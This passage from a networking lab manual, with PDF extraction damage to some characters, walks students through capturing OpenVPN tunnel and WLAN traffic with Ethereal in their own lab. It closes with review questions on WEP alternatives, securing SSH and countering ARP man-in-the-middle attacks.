5. Use theWindows-command �ipcon�g�. It should appear a TAP-interfacewith an assigned IP from the 10.4.0.0/16-network. Together with Server1 (10.4.0.1) this interface builds the tunnel. The con�guration of Server1 causes a complete rerouting of network tra�c of Host B over the VPNinterface 10.4.0.1.

6. Clarify this, by establishing a FTP-connection from Host B to Server2. Transfer the test-�le. Start Ethereal on Server 1 and begin data-capturing on the �tap�-interfaces. It should show a FTP-connectionbetween the tunnel end on Host B 10.4.0.2-6 10 and Server 2.

7. Create a screenshot with �KSnapshot�. Name: VPN-Ethereal-tap_x1

8. Start a new recording with Ethereal. Use the interface connected tothe 192.168.1.0/24 network. You should see that any tra�c is led overthe VPN tunnel on port 1194.

9. Create a screenshot with �KSnapshot�. Name: VPN-Ethereal-eth_1_x1

10. Start a third recording. Use the interface connected to the 192.168.0.0/24-network. You should see a connection between the tunnel-end on Server2 and Host B.

11. Create a screenshot with �KSnapshot�. Name: VPN-Ethereal-eth_0_x1

12. Deactivate the WEP-encryption on Host B and the accesspoint.

9Standard C:\Programme\OpenVPN10Assigned by IP-pool on Server 1

34


13. Sni� the WLAN-connection from Host D and create a screenshot with�KSnapshot�. Name : VPN-Ethereal-HostD_x1

14. Stop the FTP-transfer.

15. Save your screenshots and delete them.

35

Chapter 6

Interpretation of test results

Please answer the following questions after completion of the lab-test:

1. How can throughput problems be avoided within WLAN-networks?

2. Call further alternatives to WEP and Openvpn.

3. Which possibilities exist to secure SSH?

4. How could MITM ARP attacks be uncovered?

5. How could MITM ARP attacks be repelled?

36

Bibliography

[1] Gareth Anderson. GNU/Linux Command-Line Tools Summary.http://www.karakas-online.de/gnu-linux-tools-summary/gnu-linux-tools-summary.pdf.

[2] Cisco Systems INC. Cisco Aironet 1200 Series Access Point Installationand Con�guration Guide. 2003.http://www.cisco.com/en/US/products/hw/wireless/ps430/.

[3] O'Reilly. linuxquickref.http://www.hpcc.uh.edu/usergroup/20050225/linuxquickref.pdf.

37

Laboratorytest Security in WLAN and in switched · PDF fileLaboratorytest Security in WLAN and...

Documents

Transcript of Laboratorytest Security in WLAN and in switched · PDF fileLaboratorytest Security in WLAN and...